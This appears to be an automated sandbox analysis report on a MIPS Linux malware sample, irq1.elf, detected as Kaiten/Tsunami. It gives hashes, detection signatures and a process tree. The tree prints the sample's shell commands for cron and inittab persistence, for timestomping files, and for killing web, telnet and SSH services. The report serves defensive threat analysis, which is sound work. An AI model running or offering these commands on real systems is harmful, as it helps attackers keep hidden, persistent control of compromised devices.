Analysis
-
max time kernel
8s -
max time network
5s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
22-10-2024 16:06
Static task
static1
Behavioral task
behavioral1
Sample
irq1.elf
Resource
debian9-mipsbe-20240611-en
General
-
Target
irq1.elf
-
Size
510KB
-
MD5
2aa1abc12fdf779dbe4e71ed20111bce
-
SHA1
fee772fa1e9c94d9b89ffa3fa89df08c4a1fe84f
-
SHA256
a1f211877e5ac29682f07d0b97d02ee936ed02f3355b68d7163b3336164d85f6
-
SHA512
e9b95f9c28e39fa3c57f921ac2e55f5ee1b22d3664b8059f53610b059e620230ff63db7d39a5a9c256f39aa99d1b1333f4bd0acefe44bd826048c60b4e5c6fc0
-
SSDEEP
6144:21cNQ3N/6H7bvnWGSTOk/Gsw6apMBNedo+nS2Ref6zIfcxnjL/Va+wjdIBKPO7QZ:2CQd/SVV2PsfssIfyn/U+sm7Q380/
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/710-1-0x00400000-0x00568718-memory.dmp family_kaiten2 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.98SrGd crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Indicator Removal: Timestomp 1 TTPs 4 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
pid Process 714 sh 718 touch 752 sh 754 touch -
Enumerates kernel/hardware configuration 1 TTPs 9 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/4/stat killall File opened for reading /proc/702/cmdline killall File opened for reading /proc/771/stat killall File opened for reading /proc/807/stat killall File opened for reading /proc/17/stat killall File opened for reading /proc/8/stat killall File opened for reading /proc/703/stat killall File opened for reading /proc/383/stat killall File opened for reading /proc/73/stat killall File opened for reading /proc/76/stat killall File opened for reading /proc/4/stat killall File opened for reading /proc/23/stat killall File opened for reading /proc/version irq1.elf File opened for reading /proc/4/stat killall File opened for reading /proc/7/stat killall File opened for reading /proc/755/stat killall File opened for reading /proc/76/stat killall File opened for reading /proc/702/stat killall File opened for reading /proc/808/stat killall File opened for reading /proc/8/stat killall File opened for reading /proc/764/stat killall File opened for reading /proc/72/stat killall File opened for reading /proc/707/stat killall File opened for reading /proc/702/cmdline killall File opened for reading /proc/702/stat killall File opened for reading /proc/357/stat killall File opened for reading /proc/713/stat killall File opened for reading /proc/12/stat killall File opened for reading /proc/13/stat killall File opened for reading /proc/15/stat killall File opened for reading /proc/81/stat killall File opened for reading /proc/2/stat killall File opened for reading /proc/37/stat killall File opened for reading /proc/19/stat killall File opened for reading /proc/37/stat killall File opened for reading /proc/15/stat killall File opened for reading /proc/703/cmdline killall File opened for reading /proc/5/stat killall File opened for reading /proc/77/stat killall File opened for reading /proc/23/stat killall File opened for reading /proc/71/stat killall File opened for reading /proc/73/stat killall File opened for reading /proc/715/stat killall File opened for reading /proc/12/stat killall File opened for reading /proc/331/stat killall File opened for reading /proc/5/stat killall File opened for reading /proc/354/stat killall File opened for reading /proc/71/stat killall File opened for reading /proc/84/stat killall File opened for reading /proc/683/stat killall File opened for reading /proc/788/stat killall File opened for reading /proc/21/stat killall File opened for reading /proc/21/stat killall File opened for reading /proc/23/stat killall File opened for reading /proc/75/stat killall File opened for reading /proc/filesystems sed File opened for reading /proc/75/stat killall File opened for reading /proc/679/stat killall File opened for reading /proc/8/stat killall File opened for reading /proc/679/stat killall File opened for reading /proc/72/stat killall File opened for reading /proc/18/stat killall File opened for reading /proc/702/cmdline killall File opened for reading /proc/17/stat killall
Processes
-
/tmp/irq1.elf/tmp/irq1.elf1⤵
- Reads runtime system information
PID:710 -
/bin/shsh -c "touch -acmr /bin/ls /tmp/irq1.elf"2⤵
- Indicator Removal: Timestomp
PID:714 -
/usr/bin/touchtouch -acmr /bin/ls /tmp/irq1.elf3⤵
- Indicator Removal: Timestomp
PID:718
-
-
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/irq1.elf\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"2⤵PID:720
-
/usr/bin/crontabcrontab -l3⤵PID:723
-
-
/bin/grepgrep -v /tmp/irq1.elf3⤵PID:724
-
-
/bin/grepgrep -v "no cron"3⤵PID:725
-
-
/bin/grepgrep -v lesshts/run.sh3⤵PID:726
-
-
-
/bin/shsh -c "echo \"* * * * * /tmp/irq1.elf > /dev/null 2>&1 &\" >> /var/run/.x00740882966"2⤵PID:729
-
-
/bin/shsh -c "crontab /var/run/.x00740882966"2⤵PID:731
-
/usr/bin/crontabcrontab /var/run/.x007408829663⤵
- Creates/modifies Cron job
PID:733
-
-
-
/bin/shsh -c "rm -rf /var/run/.x00740882966"2⤵PID:736
-
/bin/rmrm -rf /var/run/.x007408829663⤵PID:738
-
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/irq1.elf\" > /etc/inittab2"2⤵PID:740
-
/bin/catcat /etc/inittab3⤵PID:742
-
-
/bin/grepgrep -v /tmp/irq1.elf3⤵PID:743
-
-
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/irq1.elf\" >> /etc/inittab2"2⤵PID:745
-
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"2⤵PID:747
-
/bin/catcat /etc/inittab23⤵PID:748
-
-
-
/bin/shsh -c "rm -rf /etc/inittab2"2⤵PID:749
-
/bin/rmrm -rf /etc/inittab23⤵PID:751
-
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"2⤵
- Indicator Removal: Timestomp
PID:752 -
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab3⤵
- Indicator Removal: Timestomp
PID:754
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:756
-
/bin/uname/bin/uname -n3⤵PID:757
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:758
-
/bin/uname/bin/uname -n3⤵PID:759
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:761
-
/bin/uname/bin/uname -n3⤵PID:762
-
-
-
/bin/shsh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"2⤵PID:767
-
/bin/catcat /var/run/httpd.pid3⤵PID:770
-
-
-
/bin/shsh -c "service httpd stop > /dev/null 2>&1 &"2⤵PID:769
-
-
/bin/shsh -c "killall -9 mini_httpd > /dev/null 2>&1 &"2⤵PID:772
-
-
/bin/shsh -c "killall -9 minihttpd > /dev/null 2>&1 &"2⤵PID:774
-
-
/bin/shsh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"2⤵PID:777
-
/bin/catcat /var/run/thttpd.pid3⤵PID:780
-
-
-
/bin/shsh -c "nvram set httpd_enable=0 > /dev/null 2>&1"2⤵PID:781
-
-
/bin/shsh -c "nvram set http_enable=0 > /dev/null 2>&1"2⤵PID:782
-
-
/bin/shsh -c "killall -9 httpd > /dev/null 2>&1 &"2⤵PID:784
-
-
/bin/shsh -c "service telnetd stop > /dev/null 2>&1 &"2⤵PID:786
-
-
/bin/shsh -c "service sshd stop > /dev/null 2>&1 &"2⤵PID:788
-
-
/bin/shsh -c "killall -9 telnetd > /dev/null 2>&1 &"2⤵PID:790
-
-
/bin/shsh -c "killall -9 utelnetd > /dev/null 2>&1 &"2⤵PID:796
-
-
/bin/shsh -c "killall -9 dropbear > /dev/null 2>&1 &"2⤵PID:800
-
-
/bin/shsh -c "killall -9 sshd > /dev/null 2>&1 &"2⤵PID:804
-
-
/bin/shsh -c "killall -9 lighttpd > /dev/null 2>&1 &"2⤵PID:806
-
-
/usr/sbin/serviceservice httpd stop1⤵PID:771
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:775
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:778
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:783
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵
- Enumerates kernel/hardware configuration
PID:793
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:794
-
-
/usr/bin/killallkillall -9 mini_httpd1⤵
- Reads runtime system information
PID:773
-
/usr/bin/killallkillall -9 minihttpd1⤵
- Reads runtime system information
PID:776
-
/usr/bin/killallkillall -9 httpd1⤵
- Reads runtime system information
PID:785
-
/usr/sbin/serviceservice telnetd stop1⤵PID:787
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:791
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:798
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:802
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵
- Enumerates kernel/hardware configuration
PID:812
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:813
-
-
/usr/sbin/serviceservice sshd stop1⤵PID:789
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:797
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:801
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:807
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵
- Enumerates kernel/hardware configuration
PID:815
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵
- Reads runtime system information
PID:816
-
-
/usr/bin/killallkillall -9 telnetd1⤵
- Reads runtime system information
PID:795
-
/usr/bin/killallkillall -9 utelnetd1⤵
- Reads runtime system information
PID:799
-
/usr/bin/killallkillall -9 dropbear1⤵
- Reads runtime system information
PID:803
-
/usr/bin/killallkillall -9 sshd1⤵
- Reads runtime system information
PID:805
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:771
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:771
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:771
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:771
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:771
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵
- Enumerates kernel/hardware configuration
PID:771
-
/usr/bin/killallkillall -9 lighttpd1⤵
- Reads runtime system information
PID:808
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:787
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:787
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:787
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:787
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:787
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵
- Enumerates kernel/hardware configuration
PID:787
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:789
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:789
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:789
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:789
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:789
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵
- Enumerates kernel/hardware configuration
PID:789
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
29B
MD54b6c8b3e85f69b4d6e5dc7e21e0e080c
SHA18be6abb1b0a2748c2a71b3dcd94dadef5eb461d8
SHA2560cea0534ee5c7e568506ed12b4b7f76974e671217ebddceecf5f1b5a6509a691
SHA5126aa245a878e3e0f52b29e1728841c31a5ec5686b9b6829108eb6a7b18963c24861be56d4f421e836acf5723dc0e86350d6dc676e724fc971f4c8d85e5f7fdabe
-
Filesize
43B
MD5b8a197653fa38bb8f6cd05c260db1d1d
SHA19a5e041dbd2c418a6d52f63f4710950ab1ccd73e
SHA256cf9172a18e28040a394c7d9452b17214d4bcc6dd2cf6a73dc68a359fc4db1580
SHA5125e653a8a10bdddba19a8843c7fbeab79b9fe8ef7e05029aa4399c33b568e43a5d6e84827f4a0b670217961ab353deed948f643065c2dfc367aa2c95d02822e91
-
Filesize
239B
MD5f68b0672640265d17a4b5fb87b89adcf
SHA1598f14a14194ff702e988f4567796800c89adbf9
SHA25673d21514f5ba85b19859fa90aa00af21ac7d2917543a17579dfc7b8242786ccc
SHA5124c9962a66921bf6582accbdca6205c7279715e0cb7c66f5c268508d9e07916b5a1202dda82cc433c7368168bc3b40ca53881ddb9943587024b736af57a5559df